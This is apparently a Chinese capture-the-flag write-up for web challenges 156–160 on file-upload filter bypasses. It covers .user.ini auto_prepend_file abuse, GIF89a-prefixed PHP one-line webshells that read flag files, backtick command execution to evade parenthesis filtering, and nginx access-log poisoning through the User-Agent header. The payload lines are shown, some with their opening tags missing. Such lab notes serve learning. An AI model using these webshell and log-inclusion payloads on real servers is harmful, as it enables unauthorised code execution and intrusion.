Web 156
.user.ini 文件可以正常上传,可以先上传.user.ini 文件然后再上传写有木马的png图片,然后访问/upload页面
Web 157
可以上传.user.ini文件,new.png也可以正常上传,操作和上题一样。
Web 158
操作和上题一样。
一句话木马:
GIF89a
= system('cat ../fla*')?>
Web 159
可以上传 user.ini 文件,不过木马上传失败了。
看了一眼题解,发现括号被过滤了,需要用反引号执行命令。
:
GIF89a
= `cat ../fla*`?>
Web 160
过滤了空格,导致原 .user.ini 文件无法正常上传。
.user.ini
auto_prepend_file=1.png
新方法:日志包含
参考文章:(5条消息) 日志包含漏洞_火火火与霍霍的博客-CSDN博客_日志包含
本题access.log文件存储的是User-Agent信息。可以在User-Agent处写入php代码,在包含日志文件时就可以执行该代码。
先上传.user.ini文件,再上传:
:
=include"/va"."r/lo"."g/nginx/access.l"."og"?>
(过滤了log,所以需要采取字符串拼接的形式)
总结:
过滤关键词php导致带有php的木马无法上传。绕过方式:短标签
过滤括号。绕过方式:反引号
日志包含结合文件上传
短标签
短标签开启:(配置文件:php.ini)
short_open_tag = On
/*程序操作*/ ?>
=/*函数*/?>
相当于